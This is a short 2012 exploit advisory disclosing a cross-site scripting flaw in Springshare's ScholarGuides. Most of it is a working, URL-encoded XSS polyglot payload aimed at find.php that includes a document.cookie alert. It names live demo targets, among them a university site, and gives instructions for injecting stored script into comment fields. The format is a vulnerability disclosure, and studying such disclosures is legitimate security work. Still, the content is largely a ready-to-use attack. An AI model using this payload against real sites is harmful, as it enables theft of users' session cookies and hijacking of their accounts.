ScholarGuides Springshare suffers from a cross site scripting vulnerability.
45c8e85c3e2c356c3e531c8b837a19e84d5d3a6beb711633b7eb7764694cf5e3
# Exploit Title: ScholarGuides Springshare Cross Site Scripting
# Date: 6.02.2012
# Author: Sony
# Software Link: http://www.springshare.com/
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/02/scholarguides-springshare-cross-site.html
..................................................................
Well, we have xss in the find.php:
Our xss code:
http://codepad.org/LqL68vIQ
Demo:
http://demo.scholarguides.com/find.php?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
http://2.bp.blogspot.com/-5B5VIiOdNn8/TzAZjj3FwJI/AAAAAAAAAbU/fJsY95yothE/s1600/deee.JPG
Also we have frame in the comments or what you want:
Put code in all fields in comments and save this.
http://scholarguides.unm.edu/content.php?pid=46346&sid=342120 (demo)
http://2.bp.blogspot.com/-tK7ZXx87Jj4/TzAZvm0V2zI/AAAAAAAAAbg/li0Vo_AqaII/s1600/bugss.JPG
..................................................................
InSecurity.Ro
Because we care, we're security aware!